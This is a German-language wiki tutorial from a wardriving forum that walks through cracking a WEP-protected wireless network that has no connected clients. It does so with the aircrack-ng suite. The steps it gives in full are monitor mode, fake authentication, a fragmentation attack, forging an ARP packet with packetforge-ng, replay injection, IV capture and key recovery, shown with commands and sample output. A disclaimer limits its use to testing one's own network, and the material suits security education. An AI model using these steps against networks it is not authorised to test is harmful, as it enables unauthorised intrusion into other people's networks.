Aircrack-Tutorial/WEP ohne Client mit packetforge

Aus Wardriving-Forum.de Enzyklopädie
Wechseln zu: Navigation, Suche
Haftungsauschluss
Die auf dieser Seite beschriebene Anleitung ist ein gemeinschaftliches Projekt freiwilliger Mitarbeiter nach dem Wiki-Prinzip.
Trotz ständiger Qualitätssicherung ist ein Schaden an deiner Hard- und Software nicht ausgeschlossen, wir übernehmen hierfür keine Haftung.



Vorwort[Bearbeiten]


  • 1. Dieses Aircrack-Tutorial soll keine Anleitung sein, um mutwillig in fremde Netzwerke einzudringen. Es ist ausschliesslich dazu gedacht die Sicherheit des eigenen WEP-gesicherten WLANs zu testen bzw. um aufzuzeigen wie unsicher die WEP-Verschlüsselung ist.


  • 2. Ich habe dieses Tut. aus folgenden Gründen verfasst:

- um einen kleinen Einblick in die Möglichkeiten der aircrack-suite zu gestatten

- um zu zeigen wie mächtig die Fragmentattacke ist

- und zu guter Letzt, ist es einfach sehr zeitaufwendig eine einigermaßen brauchbare Anleitung auf deutsch zu finden;

Vorteile[Bearbeiten]

Vorteile gegenüber anderen Angriffsmodellen sind:

  • es müssen keine Clients online sein
  • man ist nicht auf den Datentransfer zwischen Router und Client angewiesen, um ein ARP abzufangen

Nachteile[Bearbeiten]

  • die leicht gestiegene Anzahl an auszuführenden Befehlen und der damit verbundene Zeitaufwand
  • es funktioniert nur in seltenen Fällen

Voraussetzungen[Bearbeiten]

Da ich auf dieses Thema (im Moment) nicht weiter eingehen möchte sind die Voraussetzungen, um dieses Tut durchführen zu können wie folgt:

1) entweder ihr habt das OS installiert oder als Live-CD und/oder

1a) ihr lest den Artikel Aircrack-Tutorial/WEP mit Client von Breil und Lord-carlos bevor ihr dieses angeht (besonders den Part Installation *gG*)

2) eine injection-fähige WLAN-Karte z.B. mit Atheros-Chipsatz

Vorbereitung[Bearbeiten]

Als erstes müsst ihr euer WLAN ausfindig machen. Dazu startet ihr nun Kismet. (Solltet ihr Kismet zum ersten mal verwenden so drückt nach erfolgreichem Start h um ein weiteres Vorgehen möglich zu machen)

Notieren solltet ihr nun:


Name eures Netzerkes z.B. MeinWLan

Bssid eures Netzwerkes bzw. Mac des Routers z.B. 00:01:02:03:04:05

den channel auf dem ihr sendet z.B. 11


Nun kann Kismet getrost geschlossen werden.

Start[Bearbeiten]

Als erstes muss eure WLAN-Karte bzw. euer WLAN-Interface auf den Channel des Routers eingestellt werden. Dazu müssen eure jeweilig laufenden Interfaces runtergefahren, eingestellt und gestartet werden.


Terminal öffnen:

airmon-ng

eingeben. Bei mir erscheinen nun meine Wlan-Interfaces wie folgt:


Interface Chipset Driver
  • wifi0 Atheros madwifi-ng
  • ath0 Atheros madwifi-ng VAP (parent: wifi0)
  • ath1 Atheros madwifi-ng VAP (parent: wifi0)


WLAN-Interface ausrichten[Bearbeiten]

airmon-ng start wifi0 11


Erklärung:

  • 11 - ist der Kanal auf dem euer Router sendet


Als nächstes muss das Interface ath0 und ath1 abgeschaltet werden (kann je nach Hardware abweichen und es können auch mehr oder weniger Interfaces sein), mit den Befehlen

wlanconfig ath0 destroy
wlanconfig ath1 destroy


sollte das erledigt sein. Bei weiteren Interfaces wiederholt diesen Schritt bis nur noch wifi0 übrig bleibt.


Nun folgt:

ifconfig ath0 up


Mit diesem Befehl startet ihr das Interface ath0.

Mit

iwconfig ath0 mode Monitor channel 11


habt ihr das Interface ath0 in den Monitormodus auf Kanal 11 geschaltet.


Nun sollte bei der Ausgabe folgendes erscheinen:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)


Aireplay-ng[Bearbeiten]

Das Werkzeug Aireplay-ng beinhaltet vielerlei Möglichkeiten. Wenn ihr interessiert seid, lest euch über weitere Möglichkeiten entweder in der Hilfedatei oder im I-Net. schlau. Hier wird mit dem ersten Befehl eine fake-Verbindung zum Router bzw. zum Netzwerk hergestellt. Mit dem zweiten Befehl versucht man aus Daten, die abgefangen werden, einen gültigen keystream zu generieren, der dann wiederum dazu eingesetzt wird den Datenverkehr des Routers anzuheben, um so schneller an die benötigten IV-Anzahl zu kommen, die wir brauchen um letztendlich das Passwort zu dechiffrieren.

1 Befehl:

aireplay-ng -1 100 -e MeinWLAN -a 00:01:02:03:04:05 -h 00:10:20:30:40:50 ath0


Erklärung:

  • 1 - fakeauthentication, die 100 hat hier die Bedeutung das ihr dauerhaft fakeauthentications durchführt um so eine dauerhafte Verbindung zu erhalten
  • e - Name des Netzwerkes eintragen
  • a - Mac des Routers
  • h - Mac eurer Wlan-Karte
  • ath0 - euer in den Monitormodus geschaltetes Interface

2 Befehl:

aireplay-ng -5 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ath0


Erklärung:

  • 5 - generates valid keystream
  • b - dies ist die Mac des Routers
  • h - dies ist die Mac eurer Netzwerkkarte


Nun sollte folgendes erscheinen:


... Waiting for data packet... . . . Use this packet? y

Hier mit y bestätigen

. . Now you can build....

Packetforge-ng[Bearbeiten]

Mit packetforge-ng können wir ein passendes Packet erstellen, welches dem Router geschickt wird, um so die nötigen IVs zu sammeln.


packetforge-ng -0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0215-124336.xor -w arp-request
wrote packet: arp-request

Für den Fall das ihr nicht das richtige fragment findet um den Befehl eingeben zu können, so schreibt den Befehl bis hin zu ...fragment- und drückt nun die TAB-Taste. Nun solltet ihr alle fragment-Packete angezeigt bekommen. Selbstverständlich benötigt ihr das neuste Packet, also das mit der grössten Nummer (im Normalfall). Habt ihr dieses, so ergänzt den Befehl.

Erklärung:

  • 0 - forge an ARP packet
  • a - Mac des Routers
  • h - Mac eurer Wlankarte
  • k - setze Zieladresse (Port)
  • l - setze Quelladresse (Port)
  • y - lies PRGA von dieser Datei
  • w - schreibt das Packet in diese Datei

Airodump-ng[Bearbeiten]

Jetzt ist es an der Zeit airodump-ng zu starten, um den Datenverkehr des Routers abzufangen.

airodump-ng -c 11 --bssid 00:01:02:03:04:05 --ivs -w cap ath0


Erklärung:

  • c - der channel auf dem der Router sendet
  • bssid - Mac des Routers
  • ivs - speichert nur abgefangene IVs
  • w - schreibt die gesammelten Daten in eine cap-Datei

Aireplay-ng[Bearbeiten]

Da ihr im Moment fast keine Daten bzw. IVs abfangt, werdet ihr mit dem zuvor mit packetforge-ng gebastelten Packet ein "wenig" nachhelfen, indem ihr via aireplay-ng dem Router permanent euer Packet schickt und ihn so zum Datenverkehr zwingt.

aireplay-ng -2 -r arp-request ath0


Erklärung:

  • 2 - interactive frame selection
  • r - eure gebastelte Datei wird "scharf" gemacht


Use this packet? y

Hier mit y bestätigen

. . Saving chosen.... . . Sent 558 packets........


Ab jetzt sollten die Anzahl der gesammelten Daten (IVs) steil nach oben gehen und schon bald habt ihr genügend davon, um den passenden Netzwerkschlüssel generieren zu können.

Aircrack-ng[Bearbeiten]

Mit aircrack-ng ist es möglich ein Passwort aus verschlüsselten Daten "auszulesen". Bei einer Anzahl von rund 100 000 IVs könnt ihr den Schlüssel zu beinahe 99% knacken, allerdings könnt ihr schon bei einer wesentlich geringeren Anzahl von IVs anfangen aircrack-ng zu starten.

aircrack-ng -n 128 -b 00:01:02:03:04:05 cap-06.ivs


Sollt ihr nicht die richtige Datei cap-06.ivs finden, so schreibt den Befehl bis cap- und drückt wieder die TAB-Taste, um die richtige Datei zu finden.

Erklärung:

  • n - Schlüssellänge des Netzwerkes 64/128/152/256/512 (wichtig: die 2 gängigsten Standards sind 64 & 128, also immer zuerst diese testen)
  • b - Mac des Routers


Jetzt startet aircrack-ng und probiert in 5000-Schritten den passenden Key zu generieren. Innerhalb weniger Minuten sollte folgendes (o.ä) erscheinen:


KEY FOUND! [ 31:31:31:31:31:31:31:31:31:31:31:31:31 ] (ASCII: 1111111111111)


Autor[Bearbeiten]

Dieses Tutorial wurde von eukl1d für das wardriving-forum geschrieben. Dieses Tutorial darf verlinkt, jedoch nicht ohne Nachfrage kopiert werden. Für Bearbeitungen (vor allem der Zeichensetzung) und nähere Ausführungen sowie Erläuterungen wäre ich sehr dankbar.

Dieser Artikel wird in geraumer Zeit weiter ausgearbeitet.